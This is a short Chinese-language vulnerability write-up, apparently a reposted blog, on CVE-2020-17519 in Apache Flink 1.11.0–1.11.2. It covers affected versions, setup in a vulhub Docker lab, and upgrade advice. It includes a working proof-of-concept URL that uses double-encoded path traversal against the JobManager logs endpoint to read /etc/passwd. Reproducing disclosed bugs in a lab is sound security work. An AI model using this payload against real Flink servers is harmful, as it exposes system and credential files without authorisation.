簡介
Apache Flink是一個開源流處理框架,具有強大的流處理和批處理功能,
漏洞概述
Apache Flink 1.11.0中引入的一個更改(也在1.11.1和1.11.2中發布)允許攻擊者通過JobManager行程的REST介面讀取JobManager本地檔案系統上的任何檔案,
影響版本
1.11.0、1.11.1、1.11.2
環境搭建
使用vulhub進行安裝
Vulhub地址:
https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519
啟動Apache Flink jobmanager 1.11.2:
進入目錄
cd vulhub-master/flink/CVE-2020-17519
安裝環境
docker-compose up -d

然后訪問http://your-ip:8081

漏洞復現
Poc
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

讀取成功
修復建議
升級到安全版本
安全版本:
Flink 1.11.3或Flink 1.12.0
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/245635.html
標籤:其他
上一篇:Api介面:手機空號狀態過濾檢測
